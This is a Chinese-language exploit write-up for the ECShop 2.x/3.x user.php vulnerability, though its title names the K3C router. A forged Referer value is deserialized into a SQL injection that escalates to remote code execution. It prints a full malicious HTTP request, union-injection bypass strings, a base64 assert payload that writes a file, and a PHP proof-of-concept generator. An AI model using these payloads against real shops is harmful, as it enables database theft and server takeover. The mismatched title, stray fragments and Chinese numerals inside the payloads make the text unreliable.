k3c路由器漏洞-(k3c路由器通病)

k3c路由器漏洞 (k3c路由器通病)

0x01 漏洞详情

ECShop是一款B2C独立网店系统，适合企业和个人快速打造个性化网店。系统是基于PHP语言及MYSQL跨平台开源程序的数据库架构开发。

在2017年及以前的版本中， user.php的display在函数中，模板变量可以控制，导致注入，远程代码可以与注入一起执行

0x02 影响范围

ECShop 2.xECShop 3.x0x03 漏洞分析

ringk3y哥哥把这个漏洞分析得很清楚，整个使用和绕过的过程非常精彩。感谢分享和p神提供的环境.

SQL注入：

在user.php中

$back_act变量来源于HTTP_REFERER， assign在模板变量中赋值函数。

继续跟踪 display函数

读取user_passport.dwt解析变量后的模板文件内容显示html内容，用_echash做分割，得到$k然后交给isnert_mod处理，由于_echash它是默认的，不是随机生成的，所以$val内容可以随意控制。

接着看 insert_mod函数

=1pc动态调用在这里，=1pc$val传入进来用|分割，参数进入时需要序列化。

=1pc再看include/lib_insert.php中的insert_ads函数

=1pc

这里可以直接注入

GET /user.php?act=login HTTP/1.1Accept: */*Accept-Language: zh-CNUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: IPPragma: no-cacheCookie: PHPSESSID=7dd64ac53c93500b5dff70fdc0163f2e; ECS_ID=057fee67dd00d21af00d81537cb1d09e0946bdec; ECS[visit_times]=2Referer:554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:\\"num\\";s:72:\\"0,1 procedure analyse(extractvalue(rand(),concat(0x7e,version())),1)-- -\\";s:2:\\"id\\";i:1;}Connection: close

代码执行：

继续看fetch函数

追踪_eval函数

$position_style数据库中查询结构的变量

然后我们继续构造SQL注入，因为这段sql操作 order by部分换行不能截断所以需要在id配合处理结构注释num进行union查询

payload：

SELECT a.ad_id, a.position_id, a.media_type, a.ad_link, a.ad_code, a.ad_name, p.ad_width, p.ad_height, p.position_style, RAND() AS rnd FROM `ecshop27`.`ecs_ad` AS a LEFT JOIN `ecshop27`.`ecs_ad_position` AS p ON a.position_id = p.position_id WHERE enabled = 1 AND start_time <= '1535678679' AND end_time >= '1535678679' AND a.position_id = ''/*' ORDER BY rnd LIMIT */ union select 1,2、4、5、6、7、9-- -

函数中有一个判断：

=1pc我们 id传入’/*

=1pcnum传入*/ union select 1,0x272f2a,3,4,5,6,7,8,9,10– -就能绕过了

var_dump()一下

再看fetch函数，传入的参数被fetch_str函数处理了

追踪fetch_str函数，这里的字符串处理过程比较复杂

return preg_replace(\\"/{([^\\}\\{\ ]*)}/e\\", \\"\\$this->select('\\\\1');\\", $source);

这意味着例如$source是xxxx{$asd}xxx,那么这行代码处理后，就是返回this->select(‘$asd结果，看看select函数：

第一个字符是$时进入$this->get_val函数

我们$val没有.$又进入make_var函数

最后这里引入单引号从变量中逃逸，我们要闭合_var所以最终payload是：

{$asd'];assert(base64_decode('ZmlsZV9wdXRfY29udGVudHMoJzEudHh0JywnZ2V0c2hlbGwnKQ==)；xxx

P神用在这里php写了一个Poc:这里2.x跟3.x的hash不一样，因此，使用时需要更改：

<?php$shell = bin2hex(\\"{\\$asd'];phpinfo\ ();//}xxx\\");$id = \\"-1' UNION/*\\";$arr =[ \\"num\\" => sprintf('*/SELECT 1,0x%s,四、五、六、七、八x%s,10-- -', bin2hex($id), $shell), \\"id\\" => $id];$s = serialize($arr);$hash3 = '45ea207d7a2b68c49582d2d22adf953a';$hash2 = '554fcae493e564ee0dc75bdf2ebf94ca';echo \\"POC for ECShop 2.x: \ \\";echo \\"{$hash2}ads|{$s}{$hash2}\\";echo \\"\ \ POC for ECShop 3.x: \ \\";echo \\"{$hash3}ads|{$s}{$hash3}\\";

把poc放到php环境运行：